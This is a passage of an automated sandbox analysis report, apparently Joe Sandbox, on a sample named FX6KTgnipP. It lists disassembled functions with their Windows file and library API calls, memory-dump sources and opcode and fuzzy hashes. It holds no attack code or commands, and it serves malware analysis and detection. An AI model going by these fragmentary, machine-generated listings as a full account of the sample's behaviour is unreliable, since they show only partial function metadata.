                                                                                                                                                                            • String ID: CreateThread failed
                                                                                                                                                                            • API String ID: 3138599208-3849766595
                                                                                                                                                                            • Opcode ID: 1427448bff5df7b70308bbee745a288e8f49190461c2ecb4a0eb48544300bfa0
                                                                                                                                                                            • Instruction ID: 94e0e31566999be4b17023b66388a8e679ee60a4c746f05b02e348bc40f670af
                                                                                                                                                                            • Opcode Fuzzy Hash: 1427448bff5df7b70308bbee745a288e8f49190461c2ecb4a0eb48544300bfa0
                                                                                                                                                                            • Instruction Fuzzy Hash: C301D6B53A97066FE7147F68FC85F62735CEB41711F20042DF945A6180CAF168A9877C
                                                                                                                                                                            Function 00263C78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00263C82
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00263C99
                                                                                                                                                                              • Part of subcall function 00256A89: _wcslen.LIBCMT ref: 00256AA6
                                                                                                                                                                              • Part of subcall function 0024B03D: __EH_prolog3_GS.LIBCMT ref: 0024B044
                                                                                                                                                                              • Part of subcall function 0024B3E1: __EH_prolog3_GS.LIBCMT ref: 0024B3E8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                                                                                                                                            • String ID: |Z)
                                                                                                                                                                            • API String ID: 1265872803-2689361300
                                                                                                                                                                            • Opcode ID: bf26b19c6c6bd406f5f98b055e491c4bb5917b38a33b7008602601c14a6141a5
                                                                                                                                                                            • Instruction ID: 93eb9a951090d310e5346a1c5dd38013e4c4a5d7f33c951d40246ac49a703bb9
                                                                                                                                                                            • Opcode Fuzzy Hash: bf26b19c6c6bd406f5f98b055e491c4bb5917b38a33b7008602601c14a6141a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 44110C35B315B09EDB07EB68AC25BDC7BB4AB16310F00419FE44897253CBB04AA4CFA1
                                                                                                                                                                            Function 00264906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&$@U=u
                                                                                                                                                                            • API String ID: 1269201914-115409615
                                                                                                                                                                            • Opcode ID: c40e897fad9221d569e4944bbb56ab8fde4c66a4d9cd212462e2e29d773e447a
                                                                                                                                                                            • Instruction ID: 1b9e4a715a6b5b601901cf62e9e3f424479c827a3c02fa9b9eef7ea63d42d951
                                                                                                                                                                            • Opcode Fuzzy Hash: c40e897fad9221d569e4944bbb56ab8fde4c66a4d9cd212462e2e29d773e447a
                                                                                                                                                                            • Instruction Fuzzy Hash: 33B012952BE000BD330431103E03C37010CC2C2B10330451AF840C148298829EF10035
                                                                                                                                                                            Function 00264967 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&$gI&
                                                                                                                                                                            • API String ID: 1269201914-164455618
                                                                                                                                                                            • Opcode ID: 24973a6836019034ee59f5d3b94a382f4607139b8b44829715437f5c30e30073
                                                                                                                                                                            • Instruction ID: b4d1fb54a33771e8853a0dc9b94ef100b1196209c0e3e92c3f69305f79c918c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 24973a6836019034ee59f5d3b94a382f4607139b8b44829715437f5c30e30073
                                                                                                                                                                            • Instruction Fuzzy Hash: 12B012852BE001AD330875143D03C37010CC2C3B10330C51AF844C2581D4808DF40131
                                                                                                                                                                            Function 0024DE9A Relevance: 4.6, APIs: 3, Instructions: 115fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024DEA1
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,0024E8F5,?,?,0024A6B9,?,00000011,?), ref: 0024DF15
                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,0024D303,?,?,?), ref: 0024DF65
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile$H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1771569470-0
                                                                                                                                                                            • Opcode ID: 34cf33e351ac761e9aee045b012dd3ff126f572e274bfc2c0d007b4fee5381f0
                                                                                                                                                                            • Instruction ID: 9d7b5fe9c49a0f52b9c2fbac0a6291ffb3534aeb19cb9d2f9836479804fc68e5
                                                                                                                                                                            • Opcode Fuzzy Hash: 34cf33e351ac761e9aee045b012dd3ff126f572e274bfc2c0d007b4fee5381f0
                                                                                                                                                                            • Instruction Fuzzy Hash: 85417170920209DFDB28DFA4D88ABEEB7F4FB08320F10561EE456E7691D774A954CB24
                                                                                                                                                                            Function 00256C5E Relevance: 4.6, APIs: 3, Instructions: 90libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00256C65
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00256C9A
                                                                                                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00256D0C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1552931673-0
                                                                                                                                                                            • Opcode ID: eebc060c94dfaf5e3ed918050e1f250b75cac7f497ec073e318985d6fc612764
                                                                                                                                                                            • Instruction ID: 542af7778614710149b1d330bf1e7e304c4de7e7b0aa08a1d1cdb5adaed45024
                                                                                                                                                                            • Opcode Fuzzy Hash: eebc060c94dfaf5e3ed918050e1f250b75cac7f497ec073e318985d6fc612764
                                                                                                                                                                            • Instruction Fuzzy Hash: 71318D71D20258DBDB04DFE4C889BEEBBB8AF48315F10011EE505B7281DB745AA8CF65
                                                                                                                                                                            Function 0024F58B Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024F592
                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(?,?,00000024,0024A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0024F5A8
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024F5EB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile$H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2559025557-0
                                                                                                                                                                            • Opcode ID: 689ae34dbbe9da9200b1bc4e7dc46bad45f28451fa99a196d2b1d45d87672ee5
                                                                                                                                                                            • Instruction ID: 9a7d98104d2e001cce56c8ab8a70765f9409adec686fa7b856af60f3fa4a8696
                                                                                                                                                                            • Opcode Fuzzy Hash: 689ae34dbbe9da9200b1bc4e7dc46bad45f28451fa99a196d2b1d45d87672ee5
                                                                                                                                                                            • Instruction Fuzzy Hash: FB112670920219EBCF08EFA4E985ADEB7B8BF48310F14402AF814E7250D7349AA4CF64
                                                                                                                                                                            Function 0024EC63 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024EC6A
                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,00000024,0024D6F7,?), ref: 0024EC7D
                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 0024ECBD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteFile$H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3558260747-0
                                                                                                                                                                            • Opcode ID: 88afc860ee99c8d4734c490ef32b8669741cbb6ac3d179e8fffdfeac57b4610c
                                                                                                                                                                            • Instruction ID: c54ea8df603c2e621ca8ef89f73626622097f341378f8f83d565829c39aed819
                                                                                                                                                                            • Opcode Fuzzy Hash: 88afc860ee99c8d4734c490ef32b8669741cbb6ac3d179e8fffdfeac57b4610c
                                                                                                                                                                            • Instruction Fuzzy Hash: A511E975D20219DBDF08DFA4E889AEEB7B8BF08311F14502AE405E7250D734A9A4CF65
                                                                                                                                                                            Function 0024ED1F Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024ED26
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00000024,0024ED16,00000000,0024A4A1,6294DA82,?,0024CDDD,?,?,?,?,?,?,?,?), ref: 0024ED39
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?), ref: 0024ED79
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile$H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2559025557-0
                                                                                                                                                                            • Opcode ID: 4ccfb9521324aff3ab99f08665bdbcb7403beca4bde60e8f70a5822059628960
                                                                                                                                                                            • Instruction ID: 77d1a387ef5f6f53078f522d85b9136d239f8cc374a344f185b8901fc903aaf0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ccfb9521324aff3ab99f08665bdbcb7403beca4bde60e8f70a5822059628960
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A110775D20218DFDF09DFA8D989AEDB7F9BB48310F14052AE514F3290D73499948B64
                                                                                                                                                                            Function 00264921 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 5e85c0d5d2d476aeda345b713403fb1c756caefcaa3822164910ac798aa9e361
                                                                                                                                                                            • Instruction ID: 68c57818ad948454a7ce1f3868dc4d9e0ac762f59d16c91548a45002ef1ba9cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e85c0d5d2d476aeda345b713403fb1c756caefcaa3822164910ac798aa9e361
                                                                                                                                                                            • Instruction Fuzzy Hash: 9AB012852BE100AD334471147D03C37011CC2C2B10330471BF444C2481D4808DF00135
                                                                                                                                                                            Function 0026492B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 3e7153953f1b2560f9f3d9d1c6a2eef6d498e8f0e3083a6c5c5d9ca285155abd
                                                                                                                                                                            • Instruction ID: 95777c6b04fc46cf60948414bc1f9008a8c66cfa9a2b47b18c43eaff25526293
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e7153953f1b2560f9f3d9d1c6a2eef6d498e8f0e3083a6c5c5d9ca285155abd
                                                                                                                                                                            • Instruction Fuzzy Hash: 56B012852BE000AD330471147E03C3B011CC2C2B10330471AF844C2481D4818EF10135
                                                                                                                                                                            Function 00264935 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 83d713ea7dbb4ca71773ea77868a9a01e1202578c099be57126294ba563458b3
                                                                                                                                                                            • Instruction ID: bc33435048b08c400a3882b70f080ffbd27d6b3bbe408266e42447448b0c7b7f
                                                                                                                                                                            • Opcode Fuzzy Hash: 83d713ea7dbb4ca71773ea77868a9a01e1202578c099be57126294ba563458b3
                                                                                                                                                                            • Instruction Fuzzy Hash: 7DB012852BE100AD370471147D03C37011CC2C2B10330461BF444C2481D4808DF00131
                                                                                                                                                                            Function 0026493F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 7612c2f4bb663aea95e59011475e4420c8e955df96d0362642782c7c2bac2b67
                                                                                                                                                                            • Instruction ID: 7c3562c44dfe49b611cea7f53ada322ba04a383d6b34490b78fc6b65950cd01c
                                                                                                                                                                            • Opcode Fuzzy Hash: 7612c2f4bb663aea95e59011475e4420c8e955df96d0362642782c7c2bac2b67
                                                                                                                                                                            • Instruction Fuzzy Hash: 93B012892BE100AD330471143D03C37010CC2C3B10330851AF844C2581D4819DF00131
                                                                                                                                                                            Function 0026497B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: fd18a79ca6dce4f36831dfff2a034c356a0fe352d69302aee611f7bfa5e2099b
                                                                                                                                                                            • Instruction ID: 61b881395ee391a010acac67f3223d3dae13fe90e234a97bc8ca780bca9b5f7b
                                                                                                                                                                            • Opcode Fuzzy Hash: fd18a79ca6dce4f36831dfff2a034c356a0fe352d69302aee611f7bfa5e2099b
                                                                                                                                                                            • Instruction Fuzzy Hash: FBB012852BE000AD330871143E03C37010CC2C2B10330851AF844C2581D4818EF90131
                                                                                                                                                                            Function 00264949 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
